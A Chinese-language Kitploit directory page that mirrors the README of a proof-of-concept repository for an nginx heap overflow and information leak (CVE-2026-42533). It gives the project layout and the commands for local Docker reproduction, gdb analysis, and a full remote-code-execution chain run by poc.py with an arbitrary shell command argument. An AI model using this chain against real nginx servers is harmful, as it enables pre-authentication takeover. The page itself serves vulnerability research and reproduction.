Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-42533 — nginx 堆溢出与信息泄露(CVE-2026-42533)的概念验证复现,涵盖两个攻击面、调试分析以及完整的 RCE 利用链。 | Kitploit
工具/GitHubGitHub/jelasin/cve-2026-42533
动态分析 (沙盒)漏洞分析代码分析漏洞利用调试器Web安全二进制利用
GitHubjelasin/cve-2026-42533

CVE-2026-42533

nginx 堆溢出与信息泄露(CVE-2026-42533)的概念验证复现,涵盖两个攻击面、调试分析以及完整的 RCE 利用链。

查看仓库
141个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-42533 — nginx 两遍捕获覆盖(two-pass capture clobbering)

nginx(0.9.6–1.30.3 / mainline ≤1.31.2)复杂值脚本引擎的预认证堆溢出 + 信息泄漏;CVSS 9.2。同一根因有两个触发面:HTTP(regex location + regex map)与 stream(ssl_preread + SNI + regex map)。

深度技术分析与勘误见 ANALYSIS.md。

项目结构

root@kitploit:~
.
├── ANALYSIS.md            # 深度分析(根因 / 两遍执行 / 动态证据 / RCE 链路 + 勘误)
├── README.md              # 本文件(索引)
├── http/                  # ① HTTP 变体黑盒复现(classmethod 触发面)
│   ├── nginx.conf             #   漏洞配置(regex location + regex map)
│   ├── docker-compose.yml     #   nginx:1.30.3(vuln,:8081) vs 1.30.4(fixed,:8082)
│   ├── test.sh                #   clobber / overflow / leak 三方向测试
│   └── repro.py               #   PoC,自动提取泄漏的堆指针/残留数据
├── debug/                # ② HTTP 变体 debug 构建 + pwndbg/gdb 动态分析
│   ├── Dockerfile(.buster) / docker-compose.yml(.buster) / nginx.debug.conf
│   ├── gdb.py                 #   两遍执行追踪 + LEN/VALUE 不一致告警(核心)
│   ├── attach.sh / extract-symbols.sh / trace_one.sh
│   ├── recon/                 #   堆布局侦察脚本(recon.py / recon2/4/5.py)
│   └── README.md              #   详见该目录
└── stream-rift/          # ③ stream 变体完整 RCE 链(已复现 echo pwned)
    ├── Dockerfile / docker-compose.yml / nginx.conf / server.py / entrypoint.sh
    ├── poc.py                 #   完整链(泄漏→喷射→伪造 pool→system),技术来自公开披露
    └── README.md              #   归属声明 + 运行说明

debug/src、debug/symbols*、debug/logs* 由 extract-symbols.sh 生成(DWARF 二进制 + 源码树),已 .gitignore,可重建。

三个组件

① HTTP 变体 — 黑盒复现(clobber / overflow / leak)

root@kitploit:~
cd http
docker compose up -d                       # 1.30.3(vuln) + 1.30.4(fixed)
./test.sh                                  # 三方向对比
python3 repro.py --vuln http://localhost:8081 --fixed http://localhost:8082   # 解析泄漏

② HTTP 变体 — debug 构建 + pwndbg 动态分析

root@kitploit:~
cd debug
docker compose build && docker compose up -d           # debug 构建(--with-debug + DWARF)
./extract-symbols.sh                                    # 拉二进制+源码到本机供 gdb
./attach.sh                                             # gdbserver 附着 worker(:2333)
gdb -x gdb.py                                           # pwndbg 加载;c 后从宿主发请求

详见 debug/README.md。

③ stream 变体 — 完整 RCE(echo pwned > /tmp/pwn)

root@kitploit:~
cd stream-rift
docker compose build && docker compose up -d            # nginx 1.31.1 (jammy/glibc2.35)
python3 poc.py --host 127.0.0.1 --port 29443 --leak                       # 泄漏 heap/libc/system
python3 poc.py --host 127.0.0.1 --port 29443 --cmd 'echo pwned > /tmp/pwn'
docker compose exec nginx-rce cat /tmp/pwn              # → pwned(属主 nobody = worker)

技术归属公开披露 DepthFirstDisclosures/Nginx-Rift;详见 stream-rift/README.md。

结果一览

影响HTTP 变体

stream 完整链在现代 glibc 2.35 上成立(无需软化):cleanup 派发先于 ngx_destroy_pool 的 free(),system() 抢在 abort 之前执行。可靠性“部分”(堆风水,单发约 1–2 次命中,需重试);偏移 pinned 到该构建。

前置条件

Docker + Compose;本机 gdb(+ pwndbg,用你习惯方式加载);pip install requests(http/repro.py)。

下载工具
stream 变体
信息泄漏(heap/PIE + 残留数据)✅ 稳定✅ 稳定
DoS(worker abort)✅ 稳定✅ 稳定
任意代码执行❌ 无公开 PoC(独立工程)✅ 已复现(stream-rift/)